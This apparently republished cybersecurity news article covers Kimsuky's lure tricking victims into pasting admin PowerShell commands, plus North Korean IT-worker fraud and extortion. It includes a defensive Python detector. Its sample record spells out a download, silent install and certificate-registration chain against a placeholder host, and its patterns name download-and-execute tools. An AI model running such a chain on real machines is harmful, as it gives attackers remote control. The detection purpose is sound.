North Korean Cyberattackers Hijack Devices with PowerShell Manipulation

A North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code. This method represents a shift in the group’s attack techniques, enabling them to bypass traditional security measures and gain unauthorized access to systems more efficiently.
The Social Engineering Tactic
To execute this attack, the threat actor masquerades as a South Korean government official and builds rapport with a target over an extended period. This is a classic example of social engineering, where the attacker gains the trust of the victim to manipulate them into taking a harmful action.
Once trust is established, the attacker sends a spear-phishing email with a seemingly legitimate PDF attachment. The email may contain language and formatting consistent with official government communications, making it more convincing. However, instead of delivering a malicious payload directly, the attackers use a more deceptive technique.
How the Attack Works
To read the purported PDF document, victims are instructed to click a URL that leads to a website containing a set of steps to “register” their Windows system. The site urges them to launch PowerShell as an administrator, copy/paste the displayed code snippet into the terminal, and execute it.
At first glance, the instructions appear harmless — perhaps framed as a security verification step. However, once executed, the code downloads and installs a browser-based remote desktop tool, along with a certificate file containing a hardcoded PIN from a remote server.
The malicious code then sends a web request to a remote server to register the victim’s device using the downloaded certificate and PIN. This grants the attackers persistent remote access, allowing them to exfiltrate sensitive data, monitor user activity, and potentially deploy additional malware.
This approach has been observed in limited attacks since January 2025, marking a departure from Kimsuky’s usual tactics. Unlike traditional phishing attempts that rely on malicious email attachments or exploit vulnerabilities, this method capitalizes on human behavior, tricking victims into executing the attack themselves.
Similar Techniques in Other Cyber Campaigns
Kimsuky is not the only North Korean hacking crew to adopt this strategy. In December 2024, it was revealed that threat actors linked to the Contagious Interview campaign had tricked macOS users into copying and executing malicious commands via the Terminal app. The attackers claimed the process was necessary to resolve issues with accessing the camera and microphone through a web browser.
Such attacks, along with those leveraging the so-called ClickFix method, have surged in recent months. A key reason for their success is that they rely on users to bypass their own security protections. Since the commands are executed manually by the victims, security software often fails to detect the compromise in time.
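The chain described above (an elevated PowerShell session opened by the user, a download, an installer run, a certificate and PIN posted to a registration endpoint) is what a detection should key on, and the same logic covers the ClickFix-style Terminal lures mentioned here. The following is an added example written for this article, not code from the original report or from any vendor: it triages constructed records modelled on PowerShell script block logging (Event ID 4104), assuming the collector has enriched each record with whether the host ran elevated and interactively, which is the signature of a pasted command rather than a scheduled script.

```python
import re

# Constructed sample records modelled on PowerShell script block logging (Event ID
# 4104), enriched with elevation and interactivity flags. Invented for this example,
# not real telemetry; hosts use the reserved example.invalid domain.
SAMPLE_EVENTS = [
    {"id": 1, "elevated": True, "interactive": True,
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": 2, "elevated": True, "interactive": True,
     "script": ("Invoke-WebRequest -Uri 'https://example.invalid/rd.msi' -OutFile $env:TEMP\\rd.msi; "
                "Invoke-WebRequest -Uri 'https://example.invalid/device.crt' -OutFile $env:TEMP\\device.crt; "
                "Start-Process msiexec.exe -ArgumentList '/i',\"$env:TEMP\\rd.msi\",'/qn' -Wait; "
                "Invoke-RestMethod -Method Post -Uri 'https://example.invalid/register' "
                "-Body @{cert=(Get-Content $env:TEMP\\device.crt -Raw); pin='000000'}")},
    {"id": 3, "elevated": False, "interactive": False,
     "script": "Invoke-WebRequest -Uri 'https://example.invalid/report.csv' -OutFile report.csv"},
]

# One case-insensitive pattern per stage of the chain the article describes.
STAGES = {
    "download": r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b",
    "execute": r"Start-Process|msiexec|Invoke-Expression|\biex\b",
    "credential": r"\.(crt|pfx|pem|cer)\b|\bpin\b",
    "register": r"-Method\s+Post|\bregister\b",
}

def matched_stages(script: str) -> set[str]:
    """Return the names of the chain stages whose patterns appear in the script block."""
    return {name for name, pat in STAGES.items() if re.search(pat, script, re.IGNORECASE)}

def triage(event: dict) -> dict:
    """Score one record: the full chain in an elevated, interactive session is high."""
    stages = matched_stages(event["script"])
    pasted_context = event["elevated"] and event["interactive"]
    if pasted_context and {"download", "execute", "credential", "register"} <= stages:
        severity = "high"
    elif pasted_context and {"download", "execute"} <= stages:
        severity = "medium"
    elif "download" in stages:
        severity = "low"  # plain download in an unprivileged, non-interactive host: log only
    else:
        severity = "none"
    return {"id": event["id"], "severity": severity, "stages": sorted(stages)}

def detect(events: list[dict], min_severity: str = "medium") -> list[int]:
    """Return the ids of records at or above min_severity, in input order."""
    order = ["none", "low", "medium", "high"]
    return [r["id"] for r in map(triage, events) if order.index(r["severity"]) >= order.index(min_severity)]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The stage patterns are deliberately broad; the elevation-plus-interactivity context is what keeps an ordinary download in a scheduled script from paging anyone.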
Escalation of IT Worker Fraud Scheme
In addition to direct cyber intrusions, North Korean threat actors have also been involved in fraudulent IT worker schemes, enabling them to infiltrate major corporations under false identities.
A 48-year-old woman from Arizona recently pleaded guilty for her role in such a scheme, which allowed North Korean IT workers to obtain remote jobs in more than 300 companies by posing as U.S. citizens and residents. The activity generated over $17.1 million in illicit revenue between October 2020 and October 2023.
The fraud involved stealing the identities of real U.S. nationals and using their credentials to apply for IT jobs. To make the deception more convincing, false documents were transmitted to government agencies to support the applications. Many of these jobs were at Fortune 500 corporations and involved access to sensitive internal systems.
To further facilitate the scheme, the defendant set up a laptop farm at her residence. Multiple laptops were configured to appear as if the North Korean workers were operating from within the United States, when in reality, they were based in China and Russia and remotely connected to company networks.
As a result of this fraudulent scheme:
- More than 300 companies were affected.
- Over 70 identities of U.S. nationals were compromised.
- False information was transmitted to government agencies on more than 100 occasions.
- Over 70 individuals had false tax liabilities created in their names.
Ransom and Data Extortion Tactics
Recent law enforcement efforts have put increased scrutiny on these fraudulent IT operations. However, in response, North Korean actors have escalated their tactics, turning to data exfiltration and extortion as additional revenue sources.
When North Korean IT workers are discovered within company networks, they have been known to leverage their unauthorized access to steal sensitive data, source code, and proprietary information. Rather than simply disappearing, they hold this stolen data hostage, demanding ransom payments to prevent its public release.
In some instances, North Korean IT workers have publicly leaked proprietary code from victim companies, causing reputational and financial damage. These cases highlight the evolving threat landscape, where cybercriminals are increasingly combining traditional hacking techniques with financial extortion schemes.
Defensive Measures and Mitigation Strategies
Organizations must adopt a multi-layered approach to cybersecurity to defend against these emerging threats. Key strategies include:
- Strict Authentication Policies:
- User Awareness Training:
- System Monitoring and Behavioral Analysis:
- Patch Management and Software Updates:
- Incident Response Planning:
Conclusion
The tactics employed by Kimsuky and other North Korean hacking groups illustrate the shifting nature of cyber threats. Rather than relying solely on technical exploits, attackers increasingly use deception and manipulation to trick users into compromising their own security.
At the same time, North Korea’s fraudulent IT worker schemes demonstrate how cybercrime and financial fraud are becoming intertwined. These operations not only generate revenue but also grant adversaries access to valuable corporate networks, which can be leveraged for espionage and further cyberattacks.
To counter these threats, organizations must adopt a proactive security posture. Combining user education, strict access controls, real-time monitoring, and rapid incident response will be critical in mitigating the risks posed by advanced persistent threats.
As cyber adversaries continue to refine their techniques, staying ahead of emerging threats will require continuous vigilance and adaptation. By implementing robust security measures, organizations can significantly reduce their exposure to these evolving attack vectors.
About the Creator
WIRE TOR - Ethical Hacking Services
WIRE TOR is a cyber intelligence company that provides pentest and cybersecurity news about IT, web, mobile (iOS, Android), API, cloud, IoT, network, application, system, red teaming, social engineering, wireless, and source code.